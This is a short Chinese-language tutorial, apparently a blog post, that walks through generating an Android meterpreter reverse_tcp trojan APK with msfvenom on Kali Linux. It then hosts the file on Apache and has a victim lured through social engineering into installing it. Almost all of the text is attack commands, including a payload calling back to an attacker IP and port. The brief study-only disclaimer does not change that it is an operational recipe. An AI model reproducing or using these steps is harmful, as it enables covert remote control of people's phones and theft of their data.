白帽子黑客给你演示：实战生成并移植安卓木马APK客户端文件

课前声明：

1、以下分享仅做学习交流，请自觉遵守法律法规！

一、背景介绍

对于经常使用Kali Linux虚拟机的渗透小伙伴来说，我们大多数都是进行对PC端主机进行渗透，那么如何对Android主机进行木马攻击呢？如何生成.apk的木马文件呢？如何生成并移植安卓木马apk客户端文件呢？接下里让我们一起学习！

二、资源装备

1.安装好Kali2020.2的虚拟机一台；

2.整装待发的小白一个。

三、战略安排

3.1 生成木马文件（.apk文件），如下图所示。

命令：msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.0.102lport=4444 R>

3.2 重定向保存木马文件（.apk文件），如下图所示。

命令：msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.0.102lport=4444 R>/root/shell.apk

3.3 如下图所示，.apk的木马文件生成成功。

3.4 查看生成的.apk文件，如下图所示。

命令：ls

3.5 开启虚拟主机Kali Linux的apache服务，如下图所示。

命令：service apache2 start

3.6 将生成的.apk文件复制到Apache的指定路径下，如下图所示。

命令：cp shell.apk  /var/www/html

3.7 查看虚拟主机IP，如下图所示。

命令：ifconfig

3.8 使用（诱导/社工）目标Android主机访问Kali Linux虚拟机进行下载木马文件（.apk文件），安装完成，如下图所示。

命令：192.168.0.102/shell.apk

3.9 以上，木马（.apk文件）生成操作介绍完毕，谢谢观看！